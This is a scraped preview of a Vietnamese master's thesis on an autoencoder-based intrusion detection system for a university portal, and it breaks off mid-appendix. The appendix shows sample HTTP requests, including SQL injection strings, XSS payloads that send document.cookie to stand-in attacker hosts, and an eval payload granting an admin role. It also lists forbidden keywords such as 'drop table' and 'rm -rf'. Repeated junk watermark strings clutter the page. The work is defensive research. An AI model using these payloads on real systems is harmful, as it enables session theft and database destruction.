1. Trang chủ
  2. Luận Văn - Báo Cáo

Hướng tiếp cận học sâu cho hệ thống phát hiện xâm nhập

94 0 0
Hướng tiếp cận học sâu cho hệ thống phát hiện xâm nhập

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

ĐẠI HỌC QUỐC GIA TP.HCM TRƯỜNG ĐẠI HỌC BÁCH KHOA ————————————— NGUYỄN QUANG SANG HƯỚNG TIẾP CẬN HỌC SÂU CHO HỆ THỐNG PHÁT HIỆN XÂM NHẬP Chuyên ngành: Khoa học Máy Tính Mã số: 8480101 LUẬN VĂN THẠC SĨ TP HỒ CHÍ MINH, tháng năm 2022 CƠNG TRÌNH ĐƯỢC HOÀN THÀNH TẠI TRƯỜNG ĐẠI HỌC BÁCH KHOA - ĐHQG-HCM Cán hướng dẫn khoa học: PGS.TS Trần Văn Hoài Cán chấm nhận xét 1: PGS.TS Đinh Đức Anh Vũ Cán chấm nhận xét 2: PGS.TS Trần Ngọc Thịnh Luận văn thạc sĩ bảo vệ Trường Đại học Bách Khoa, ĐHQG Tp.HCM ngày 28 tháng năm 2022 Thành phần Hội đồng đánh giá luận văn thạc sĩ gồm: Chủ tịch: PGS.TS Phạm Quốc Cường Thư ký: TS Lê Trọng Nhân Phản biện 1: PGS.TS Đinh Đức Anh Vũ Phản biện 2: PGS.TS Trần Ngọc Thịnh Ủy viên: PGS.TS Trần Mạnh Hà Xác nhận Chủ tịch Hội đồng đánh giá LV Trưởng Khoa quản lý chuyên ngành sau luận văn sửa chữa (nếu có) CHỦ TỊCH HỘI ĐỒNG TRƯỞNG KHOA KHOA HỌC VÀ KỸ THUẬT MÁY TÍNH ĐẠI HỌC QUỐC GIA TP.HCM CỘNG HỊA XÃ HỘI CHỦ NGHĨA VIỆT NAM TRƯỜNG ĐẠI HỌC BÁCH KHOA Độc lập - Tự - Hạnh phúc —————————— —————————— NHIỆM VỤ LUẬN VĂN THẠC SĨ Họ tên học viên: NGUYỄN QUANG SANG Ngày, tháng, năm sinh: 09/01/1997 Chuyên ngành: Khoa học Máy tính MSHV: 1970386 Nơi sinh: Lâm Đồng Mã số: 8480101 I TÊN ĐỀ TÀI: Hướng tiếp cận học sâu cho hệ thống phát xâm nhập Deep learning approach for intrusion detection system II NHIỆM VỤ VÀ NỘI DUNG: • Định nghĩa tốn xâm nhập vào máy chủ web mức ứng dụng, từ làm rõ chủ thể cần bảo vệ, cách thức xâm nhập phương cách bảo vệ • Xây dựng giải thuật học theo hướng tiếp cận học sâu để giải vấn đề xâm nhập bất thường vào chủ thể • Xây dựng hệ thống phát xâm nhập hoàn chỉnh nhằm phát xâm nhập bất thường vào chủ thể thử nghiệm hệ thống thực tế III NGÀY GIAO NHIỆM VỤ: 06/09/2021 IV NGÀY HOÀN THÀNH NHIỆM VỤ: 06/06/2022 V CÁN BỘ HƯỚNG DẪN: PGS.TS Trần Văn Hoài Tp HCM, ngày tháng năm 2022 CÁN BỘ HƯỚNG DẪN (Họ tên chữ ký) CHỦ NHIỆM BỘ MÔN ĐÀO TẠO (Họ tên chữ ký) PGS.TS Trần Văn Hoài TRƯỞNG KHOA KHOA HỌC VÀ KỸ THUẬT MÁY TÍNH (Họ tên chữ ký) Hướng tiếp cận học sâu cho hệ thống phát xâm nhập LỜI CẢM ƠN Gắn bó với khoa Khoa học Kỹ thuật Máy tính - trường Đại học Bách Khoa, Đại học quốc gia TPHCM suốt thời gian đại học tiếp sau đại học, em thật biết ơn cảm thấy may mắn tiếp xúc, làm việc với thầy cô Các thầy cô giỏi chuyên môn, tận tâm việc dạy em suốt trình học tập Trước tiên, em xin gửi lời cảm ơn đến Quý thầy cô khoa Khoa học Kỹ thuật Máy tính, người hết lòng giảng dạy, hướng dẫn, truyền đạt tri thức cho em có vốn kiến thức suốt thời gian qua Những kiến thức kinh nghiệm học giúp em có hành trang quý giá họp tập sống Em xin gửi lời cảm ơn đến thầy, cộng em Trung tâm liệu công nghệ thơng tin - trường đại học Bách Khoa đóng góp ý tưởng để em xác định đề tài luận văn, giúp đỡ, hỗ trợ tạo điều kiện cho em nhiều trình học tập Em xin gửi lời cảm ơn đặc biệt đến thầy PGS.TS Trần Văn Hồi, cảm ơn thầy tận tình dạy, hướng dẫn em thực giai đoạn đề tài, đóng góp ý kiến, chia sẻ kinh nghiệm em có thêm nhiều tư liệu, kiến thức thuận tiện nhiều thực đề tài Sau cùng, em xin kính chúc tồn thể Q thầy ln dồi sức khỏe, niềm vui thành công sống Em xin chân thành cảm ơn Nguyễn Quang Sang Trang i Hướng tiếp cận học sâu cho hệ thống phát xâm nhập TĨM TẮT LUẬN VĂN Lĩnh vực cơng nghệ thơng tin ngày phát triển mạnh mẽ, nhiều công nghệ sáng tạo sâu vào sống chúng ta, hỗ trợ hầu hết lĩnh vực Tuy nhiên, với phát triển phát triển không ngừng mối đe dọa công không gian mạng mà chuyên gia bảo mật khó xác định lường trước kiểu công kẻ công Dữ liệu nguồn tài nguyên quý giá, nhạy cảm dễ bị xâm nhập hệ thống cung cấp dịch vụ Dữ liệu Cổng thông tin trường Đại học Bách Khoa (Portal) liên quan đến nhiều thông tin cán bộ, sinh viên, đơn vị trực thuộc nên liệu nhạy cảm, cần bảo mật, tránh khỏi truy cập không cho phép vào sở liệu Luận văn trình bày phân tích giải pháp để xây dụng hệ thống bảo vệ nguồn liệu Portal Cụ thể hệ thống thu thập HTTP request mà người dùng truy cập vào Portal, tokenize chúng chuyển hóa chúng thành số dạng đồ thị tương quan Tiếp theo đó, hệ thống thực việc huấn luyện tập liệu vơ hại mơ hình mạng autoencoder để học đặc trưng request vô hại đến hệ thống Từ đặc trưng này, hệ thống nhận định request bất thường, có hại, mang đặc trưng khác xa với đặc trưng mà hệ thống học được, từ hệ thống đưa cảnh báo bảo mật đến quản trị viên hệ thống để họ có biện pháp đối phó phù hợp Trang ii Hướng tiếp cận học sâu cho hệ thống phát xâm nhập ABSTRACT Information technology is growing strongly, many new technologies are created and it has penetrated deeply into each of our lives, supporting us in almost all fields However, along with that development is the continous development of attack threads that even security experts find it difficult to identify and predict Data is a very valuable, sensitive and vulnerable resource of a service system Data of the Ho Chi Minh city University and Technology portal (Portal) involves a lot of information of staffs, students and affiliated departments, so this data is very sensitive, needs to be kept confidential, and avoids unauthorized access to this data This thesis presents and analyzes a solution to build a data source protection system of Portal Specifically, this system collects HTTP requests that users access to the Portal, tokenizes them and converts them into numbers in the form of correlation graph Next, the system will perform training on the innocuous dataset using the autoencoder model to learn a feature of the innocuous requests to the system From these characteristics, the system will identify unusual, harmful requests, with characteristics that are far from the characteristics that the system has learned, from which the system will issue the security alert to the system adminitrators so that they can take approprite countermeasures Trang iii C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập LỜI CAM ĐOAN Tôi cam đoan luận văn "Hướng tiếp cận học sâu cho hệ thống phát xâm nhập" nghiên cứu tơi Ngoại trừ tài liệu tham khảo trích dẫn luận văn này, tơi cam đoan tồn phần phần nhỏ luận văn chưa công bố sử dụng để nhận cấp nơi khác Khơng có sản phẩm/nghiên cứu người khác sử dụng luận văn mà không trích dẫn quy định Luận văn chưa nộp để nhận cấp trường đại học sở đào tạo khác Tp Hồ Chí Minh, tháng năm 2022 Tác giả Nguyễn Quang Sang Trang iv Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập Mục lục MỞ ĐẦU 1.1 Lý hình thành đề tài 1.2 Mục đích, đối tượng phạm vi nghiên cứu 1.3 Ý nghĩa khoa học thực tiễn đề tài nghiên cứu TÌNH HÌNH NGHIÊN CỨU VÀ THÁCH THỨC 2.1 Các nghiên cứu liên quan đến đề tài 2.2 Vấn đề cần tập trung nghiên cứu, giải 16 PHƯƠNG PHÁP ÁP DỤNG MƠ HÌNH AUTOENCODER ĐỂ PHÁT HIỆN BẤT THƯỜNG CỦA REQUEST 18 3.1 Công nghệ sử dụng 19 3.1.1 NodeJS 19 3.1.2 Python 20 3.1.3 RabbitMQ 20 3.2 Thu thập liệu 21 3.3 Phân tích liệu 25 3.4 Chuyển hóa liệu thành dạng số 30 3.5 Xây dựng mơ hình huấn luyện 33 3.6 Xây dựng hệ thống phát cảnh báo 39 TÍNH TỐN THỰC NGHIỆM VÀ PHÂN TÍCH 43 4.1 Những đại lượng đánh giá 43 4.2 Xây dựng mơ hình mạng huấn luyện 45 4.3 Thử nghiệm liệu CSIC 2010 47 4.4 Áp dụng vào liệu Portal 51 4.5 Triển khai vào hệ thống thật, đánh giá hiệu 54 Trang v Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập KẾT LUẬN VÀ HƯỚNG PHÁT TRIỂN 58 Tài liệu tham khảo 60 Phụ lục 63 Trang vi Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập Danh sách hình vẽ Cấu trúc hệ thống phát xâm nhập tầng máy chủ cho Portal 18 NodeJS 19 Python 20 RabbitMQ 21 Luồng xử lý để thu thập liệu HTTP request từ người dùng 23 Đồ thị thể tương quan thành phần request 28 Một PUT request có liệu thuộc dạng chuỗi HTML 30 Các bước tokenizing request 31 Kiến trúc chung mơ hình Autoencoder [6] 34 10 Kiến trúc mơ hình Vanilla Autoencoder [11] 11 Mơ hình mạng convolutional autoencoder [14] 37 12 Trục số biểu thị giá trị θ 39 13 Luồng xử lý hệ thống phát 40 14 Cấu trúc mơ hình mạng VA 15 Cấu trúc mơ hình mạng DA 46 16 Cấu trúc mơ hình mạng CAE 46 17 Phân bổ liệu tập liệu CSIC2010 49 18 Biểu đồ thể độ xác mơ hình mạng tập liệu CSIC2010 50 19 Phân bổ liệu tập liệu Portal 51 20 Biểu đồ thể độ xác mơ hình mạng tập liệu Portal 52 21 So sánh độ xác tham số α khác 53 22 Số lượng request thời gian xử lý trung bình vào khung ngày 55 36 45 Trang vii Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập "phone": "+1 514-396-8800", "email": "international@etsmtl.ca", "website": "https://www.etsmtl.ca/en/ets", "diaChi": "1100 Notre-Dame Street West (corner of Peel) Montreal QC H3C 1K3 514 396-8800", "theManh": "The Ecole de technologie superieure is a constituent establishment of the Universite du Quebec ETS, which specializes in engineering and technological transfer education as well as applied research, trains engineers and researchers who are recognized for their practical and innovative approach.\n", "moTa": "

ÉTS và DHBK ký ket thoa thuan hop tác nam 2014 ve to chuc seminar, trao doi sinh viên và giang viên, hop tác nghiên cuu, dong huong dan. 

\n", "kichHoat": "1", "quocGia": "CA", "loaiDoiTac": [ "21" ] 13 14 15 16 17 18 19 20 21 22 23 } }, "query" :{}, "requestTime" :1645516467817.0 24 25 26 27 28 } { "method": "PUT", "httpVersion": "1.0", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36", "originalUrl": "/api/khcn/cong-trinh-khoa-hoc?t=1645516791500", "cookies": "s:4nRpRSvRk0npNcSf0qDgjaYQLlfRgbZK.RlNiAh2fgLhtawQ OgyGXM+54M7KrNdy8BGQv/80JxZA", "body": { Trang 68 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập "maCongTrinh": "20220045", "shcc": "004057", "changes": { "loaiCongTrinh": "BQ", "tenBaiBao": "An assessment of groundwater quality for drinking and agricultural purposes in Ca Mau peninsula, Vietnamese Mekong Delta", "soTacGiaChinh": "1", "soTacGia": "5", "soTacGiaInBk": "2", "tenTacGia": "Quang Khai Ha, Mai Van Le Thi, Phu Le Vo, Hong Quan Nguyen and Abhijit Mukherjee", "sanPhamVuotTroi": "0", "isbn": "1775-1315", "fkMaLoaiTapChi": "07", "fkMaLoaiHoiNghi": "", "diemIf": "", "xepHang": "0", "tenTapChi": "IOP Conference Series: Earth and Environmental Science", "soTapChi": "964", "trangDangBaiBao": "012008", "trangThaiBaiBao": "01", "ngayThangXbTapChi": "1640970000000", "city": "", "quocGia": "", "lvSciText": "", "linkBaiBao": "https://doi.org/10.1088/1755-1315/964/1/012008", "ghiChu": "", "timeStrap": "1645516791489", "ghiChuTapChi": "", "ghiChuHoiNghi": "", "namXuatBanTapChi": "2022" } }, "query": "{}", "requestTime": 1645516790589.0 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 } Trang 69 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập HTTP request dạng DELETE { "method" :"DELETE", "httpVersion" :"1.0", "userAgent" :"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36", "originalUrl" : "/api/doi-ngoai/doi-tac-hoc-thuat?t=1645519882312", "cookies" : "s:jHdEkFdS4H1i4dnZnaQ0lgxpVaqCgcNc.AXbZ8E+xGUaDdX hXjDvVNlSgZgxblNvoS+mVAhKtiv4", "body" :{ "id": "217" }, "query" :{}, "requestTime" :1645519882144.0 10 11 12 } { "method": "DELETE", "httpVersion": "1.0", "userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0", "originalUrl": "/api/khcn/cong-trinh-khoa-hoc?t=1645764164150", "cookies": "s:txfXfHzIZj9VsqT9-MuhqsO1qDEElzoP.rBVy3qeHjZq91h /HWrwHmBb25WEvxlzj8ofd9aMPkxI", "body": { "maCongTrinh": "20212263", "shcc": "002597" }, "query": {}, "requestTime": 1645764164211.0 10 11 12 13 } Các loại HTTP request bất thường Portal Trang 70 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập { "method" :"GET", "userAgent" :"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36", "originalUrl" : "/api/doi-ngoai/ky-ket-thanh-phan-truong/all", "query" :{ "condition": { "kyKetId": "329 Or 1=1; drop tablE DN_ky_ket" } }, "body" :{} 10 11 } { "method": "GET", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36", "originalUrl": "/api/khcn/linh-vuc-nghien-cuu-khcn/page/1;select * from LINH_VUC_NGHIEN_CUU where ma like ’%%’/30", "query": { "maCha": " window.open(’http://foiejf.tk?a=${document.cookie}’) ", "adapter": "1" }, "body": {} 10 11 12 } { "method": "GET", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36", "originalUrl": Trang 71 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập "/api/cong-trinh-khoa-hoc/user/page/1/100", "query": { "filter": { "namBd": "", "namKt": "", "loaiCongTrinh": "sessionid=12312312&+username= document.location=’http://hacker+.example.com/cgi-bin/ cookiesteal.cgi?’++document.cookie ", "donVi": "" } }, "body": {} 10 11 12 13 14 15 16 17 } { "method": "GET", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36", "originalUrl": "/api/doi-ngoai/ky-ket-phan-cong/all", "query": { "kyKetId": "eval%28app.model.canBo.update%28% 7B%7D%2C%20%7B%20role%3A%20%27admin%27%20%7D%29%29" }, "body": {} } Các từ khóa khơng phép xuất select * from select* where all_synonyms all_tables all_users system_privilege_map table_privileges table_privilege_map or 1=1 1=1 1%3D1 or 1%3D1 1%3D1 Trang 72 and 1%3D1 and 1=1 drop table drop session insert script Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập <script> <script/> %3cscript%3e 3c%2fscript%3e alert alert( onclick onerror onmouseover eval setinterval function onclick( onerror( onmouseover( eval( setinterval( document.write document.location document.cookie app.model waitfor delay exec cmd rm -rf Danh sách tham số ma trận Đề tài chuyển hóa liệu HTTP request thành ma trận với kích thước [10 × 70] Tham số giá trị cột lần lượt: / / 10 Tham số giá trị hàng lần lượt: Trang 73 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập a b c d e 10 f 11 g 12 h 13 i 14 j 15 k 16 l 17 m 18 n 19 o 20 p 21 q 22 r 23 s 24 t 25 u 26 v 27 w 28 x Trang 74 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập 29 y 30 z 31 32 33 34 35 36 ! 37 " 38 # 39 $ 40 % 41 & 42 ’ 43 ( 44 ) 45 * 46 + 47 , 48 49 50 / 51 : 52 ; 53 < Trang 75 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập 54 = 55 > 56 ? 57 @ 58 [ 59 \ 60 ] 61 ∧ 62 _ 63 64 { 65 | 66 } 67 ∼ 68 69 70 Danh sách testcase bất thường sử dụng để kiểm thử hệ thống thật Testcase 1: Về công dạng XSS { "method": "GET", "originalUrl": "/api/khcn/linh-vuc-nghien-cuu-khcn/page/2/100", "query": { "maCha": "%3CSCRipt%3Ewindow.open%28%27http%3A%2 Trang 76 Stt.010.Mssv.BKD002ac.email.ninhd 